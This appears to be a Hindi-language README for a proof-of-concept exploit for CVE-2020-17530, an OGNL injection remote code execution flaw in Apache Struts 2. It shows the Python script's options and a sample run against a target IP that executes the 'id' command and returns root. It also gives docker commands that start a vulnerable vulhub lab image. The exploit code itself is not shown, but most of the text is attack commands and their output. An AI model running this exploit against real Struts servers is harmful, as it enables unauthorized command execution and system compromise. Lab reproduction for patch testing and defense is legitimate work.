
CVE-2020-17530 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, OGNL इंजेक्शन के माध्यम से Apache Struts 2 में दूरस्थ कोड निष्पादन भेद्यता। कमजोर Struts इंस्टेंस को लक्षित करने के लिए Python स्क्रिप्ट शामिल है।
CVE-2020-17530 के लिए त्वरित POC। Apache Struts संस्करण 2.0.0 - 2.5.25 में, टैग विशेषताओं में कच्चे उपयोगकर्ता इनपुट पर जबरन Object Graph Navigational Language (OGNL) मूल्यांकन रिमोट कोड निष्पादन (RCE) का कारण बन सकता है।
$ python CVE-2020-17530.py --help
usage: CVE-2020-17530.py [-h] [-c COMMAND] [-n NAME] [-p PORT] [-t TARGET] [-u URI]
optional arguments:
-h, --help show this help message and exit
-c COMMAND, --command COMMAND
command
-n NAME, --name NAME form data name
-p PORT, --port PORT port
-t TARGET, --target TARGET
target
-u URI, --uri URI uri
$ python CVE-2020-17530.py --target 10.10.30.62 --port 8080 --uri "/index.action" --command id
uid=0(root) gid=0(root) groups=0(root)
$ docker pull vulhub/struts2:2.5.25
$ docker run -d -p 8080:8080 vulhub/struts2:2.5.25